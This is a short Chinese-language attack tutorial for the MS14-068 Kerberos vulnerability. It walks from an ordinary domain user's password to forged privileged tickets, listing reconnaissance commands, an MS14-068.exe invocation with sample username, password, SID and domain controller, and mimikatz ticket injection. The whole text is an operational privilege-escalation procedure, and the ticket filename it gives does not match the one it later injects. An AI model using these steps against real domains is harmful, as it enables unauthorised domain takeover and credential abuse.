MS14-068漏洞提权(限制条件:打了补丁或者域中有Win2012/2012R2的域控):
首先,需要拥有一台域内普通用户(假设为用户A)账户权限,知道此账户的账号密码。然后依次执行如下命令
1.
Ipconfig /all //查询本机IP段,所在域等;记录所在的域的名字
Net group “domain controllers” /domain 查看域控制器
所以所在的域全名 WIN-DTHKV3MCSKH.dc.com
2.
Klist purge //清除本机所有票证
Whoami /all //查询SID值 ,记录SID值
利用工具包中(工具包在文章末尾提供下载-内有详细的图文说明)的MS14-068.exe 执行如下命令
“ms14-068.exe -u lisi@dc.com -p “1qaz@WSX” -s S-1-5-21-1382597820-942189592-943616189-1104 -d WIN-DTHKV3MCSKH.dc.com
-u 域用户名
-p 域用户密码
-s 记录的SID
-d 域控名字”
之后会在此软件同目录下生成一个名为TGT_kim@contoso.com.ccache 的票证;
利用mimikatz将票证注入内存中:
mimikatz.exe “kerberos::ptc TGT_lisi@dc.com.ccache” exit